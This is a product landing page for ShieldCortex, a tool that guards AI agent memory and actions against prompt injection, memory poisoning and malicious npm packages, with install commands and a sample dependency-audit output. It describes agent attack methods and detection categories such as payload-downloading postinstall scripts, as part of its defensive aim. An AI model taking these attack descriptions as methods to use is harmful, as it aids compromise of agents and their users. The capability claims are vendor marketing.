Memory Security
for AI Agents

ShieldCortex helps AI agents remember useful things, stop dangerous memory from spreading, and show operators exactly what was captured, recalled, blocked, and reviewed. Start free, get a 14-day Pro trial on first install, and only add cloud when you need team visibility.

See Pricing
npm install -g shieldcortex
pip install shieldcortex

Available on npm and PyPI

Designed for OpenClaw Claude Code Codex Cortex LangChain CrewAI AutoGPT
🚀
Just Released

ShieldCortex v4.4.0

X-Ray — inspect packages, files, and plugins for hidden risk. CI/CD gating, file watch, pre-install hooks, and memory guard. Plus Dream Mode, Hybrid Recall, Dependency Scanner, and more.

X-Ray CI/CD Gate Memory Guard File Watch

See It In Action

Watch ShieldCortex block a prompt injection and privilege escalation in real time.

Also on X/Twitter

Stop Bad Memory

Catch poisoning before it becomes future truth.

Prompt injection, hostile instructions, fragmented payloads, suspicious provenance, and leaked credentials are scanned before they land in durable agent memory.

Inspect Recall

See what the agent stored and why it ranks.

Capture, Recall, and Review turn memory into an operator workflow. Inspect stored memories, rank explanations, contradictions, duplicates, and low-trust records before they shape output.

Operator Security

Keep a human in control when agents misbehave.

Review queues, Incident Replay, Device Doctor, Verify, and Iron Dome analytics show what happened, what was blocked, what synced, and what the operator should do next.

Iron Dome New

The defence pipeline protects your agent's memory. Iron Dome protects your agent's actions.

$ shieldcortex iron-dome activate --profile school

Injection Scanner

40+ patterns across 8 attack categories

Action Gate

Approve, require approval, or block actions

PII Guard

Block protected data from agent output

Instruction Gateway

Only trusted channels can issue commands

Kill Switch

Trigger phrase pauses memory creation instantly

Sub-Agent Control

Restrict spawned agents' capabilities

Explore Iron Dome Read the Docs
🦞 OpenClaw Integration

Every memory your OpenClaw agent saves passes through ShieldCortex. Prompt injection, credential leaks, poisoned context — caught before it reaches storage. New: the Tool Call Interceptor actively blocks suspicious tool calls and requires operator approval before proceeding. Works as a standalone memory system or as a security layer for any memory backend.

Hook Integration

1. openclaw hooks install shieldcortex
2. openclaw plugins install @drakon-systems/shieldcortex-realtime
3. openclaw gateway restart

Hook and plugin install separately. Auto-memory is opt-in with smart deduplication.

Real-time Plugin

New

Scans every LLM input for threats and auto-extracts memories from outputs. Fire-and-forget — never blocks your agent.

Install directly with openclaw plugins install @drakon-systems/shieldcortex-realtime or use the ShieldCortex wrapper on existing setups.

Requires OpenClaw v2026.2.15+. Details →

Works on macOS, Linux (including headless servers), and Windows. Rolling out to a paid team? Use the install commands, activate the Team licence locally, set the Cloud API key, enable cloud sync, and run the persistent worker on always-on boxes. No separate signup is needed on the target machine.

Team setup guide →

AI Agents Have Three Security Problems

Most tools add memory. Very few make that memory trustworthy.

😵

Amnesia

Your agent forgets everything between sessions. No context. No learning. Starting from zero every time.

🎯

Memory Vulnerability

The moment you add memory, you create an attack surface. Memory poisoning. Prompt injection. Credential harvesting.

🤖

Behaviour Vulnerability

Agents can be tricked into executing harmful actions via prompt injection. No guardrails on what they do, only what they remember.

ShieldCortex = Memory + Poisoning Defence + Operator Control

Not just memory for agents. Memory security for agents.

What You Get

Full protection for free. Pro licence for custom rules. Team licence for cloud sync.

🛡️

Local Protection

npm package — free and open source

  • Memory Firewall — Block injection attacks in real time
  • Trust Scoring — Filter by source reliability
  • Anomaly Detection — Behavioural scoring over time
  • Codex MCP support — one install covers Codex CLI and the Codex VS Code extension on the same machine
  • MCP Tools — Native support for Claude Code, OpenClaw
  • Universal Memory Bridge — Guard any memory backend with the defence pipeline
  • 6-Layer Defence Pipeline — Sanitise, detect, analyse, validate, score, credential scan
  • Security Audit — A-F grading, CVE detection, CI/CD integration via GitHub Action
  • Iron Dome — Behaviour protection: injection scanning, action gating, PII guard
  • Memory Types — Typed memories: user, feedback, project, reference. Organise what your agent remembers.
  • Staleness Scoring — Age-based decay with automatic warnings on old memories. Stale data flagged, not trusted blindly.
  • LLM-Powered Reranking — Hybrid recall: embedding search + optional LLM reranker for precision retrieval.
  • Dream Mode — Background memory consolidation: merge duplicates, archive stale, detect contradictions. Like brain sleep for agents.
  • Save Filtering — Prevents saving derivable information (file paths, git refs, env vars). Only stores what matters.
  • Docker Install Safety — Auto-detects containers and prevents broken installs that damage host systems.

Context Preservation

  • Pre-Compaction Extraction — Auto-saves decisions, fixes, and learnings before context is lost
  • Session Continuity — Auto-loads project context at session start, extracts on exit
  • Salience Scoring — Prioritises what matters, lets noise decay naturally
  • Memory Consolidation — Promotes short-term to long-term memory, like brain sleep

Pro + Team

Licence key — from £29/mo

Pro Features

  • Custom Injection Patterns — Up to 50 regex rules for domain-specific threats
  • Custom Iron Dome Policies — Tailor behaviour controls to your use case
  • Audit Export — JSON/CSV export of your defence logs
  • Skill Scanner Deep Mode — Multi-file semantic analysis
  • Dependency Scanner — Detect malicious packages, typosquats, and suspicious install scripts in your project

Team Features

  • Cloud Audit Sync — Centralised logs across all devices
  • Team Management — Invite members, shared custom patterns
  • Memory Scopes — Private vs team memories for multi-agent deployments. Control who sees what.
  • Positive Feedback Capture — Cortex now captures confirmations, not just mistakes. Learn from success AND failure.
Compare plans →
🔒 Supply Chain Protection

Your AI agent runs npm install. Who's watching?

AI coding agents execute package installs autonomously. ShieldCortex catches supply chain attacks that Snyk and Dependabot miss.

Zero-Day Detection

  • Catches attacks BEFORE they're in CVE databases
  • Blocklist of known malicious packages updated in real-time
  • Found what others missed: axios 1.14.1, plain-crypto-js, color-diff-napi

Typosquat & Script Analysis

  • Flags lookalike package names (Levenshtein distance)
  • Scans postinstall scripts for payload downloads, OS detection, credential access
  • Warns about brand-new packages with install hooks
Pro

Auto-Quarantine

  • Doesn't just warn — actively removes threats
  • Moves malicious packages to quarantine with full manifest
  • shieldcortex audit --deps --auto-protect for CI/CD pipelines
terminal
$ shieldcortex audit --deps
[X] CRITICAL Known malicious: plain-crypto-js
[!] HIGH Typosquat detected: "axois""axios"
[!] HIGH Suspicious postinstall: downloads payload, detects OS
[~] MEDIUM New package (< 7 days) with install script
🛡️ Run with --auto-protect to quarantine threats automatically
Protect your supply chain

Your Agent Never Forgets

AI agents lose context during compaction, between sessions, and when conversations get long. ShieldCortex intercepts at every point where memory is lost.

🧠

Before Compaction

Auto-extracts decisions, fixes, and learnings before they get compressed away.

🔄

Session Start

Loads your highest-priority memories automatically. No blank slate.

⚖️

Smart Priority

Salience scoring keeps architecture decisions and bug fixes; lets noise decay naturally.

💤

Consolidation

Promotes short-term to long-term memory and merges related items. Like brain sleep.

Get Started in Minutes

Choose your path.

🦞

OpenClaw Users

1.
openclaw hooks install shieldcortex

Install the session hook

2.
openclaw plugins install @drakon-systems/shieldcortex-realtime

Install the real-time plugin

3.
openclaw gateway restart

Reload OpenClaw and start protected sessions

🐍

Python

New
1.
pip install shieldcortex

LangChain/CrewAI extras available

2.
Scan content before it reaches memory

Local scanning — no API key needed

3.
Done. Works with LangChain, CrewAI, and REST APIs.
See Python docs →
📦

Node.js

1.
npm install -g shieldcortex

Install the ShieldCortex CLI

2.
shieldcortex quickstart

Configure your agent integration

3.
shieldcortex --dashboard

View threats, audit log, and brain visualisation

Node.js 18+ or Python 3.9+ — macOS, Linux & Windows

Coming Soon

ShieldCortex X-Ray

See what your AI can't. Inspect packages, plugins, and files for hidden instructions, exfiltration paths, covert payloads, and AI-targeted exploits.

Prompt Injection Steganography Covert Channels Memory Poisoning
Learn more about X-Ray →
Trust Score
68 /100
Risk: Elevated
Critical 3
Warning 5
Info 12

Start Protecting Your Agents

Install free. Upgrade locally with a licence key.

See Pricing
npm install shieldcortex
pip install shieldcortex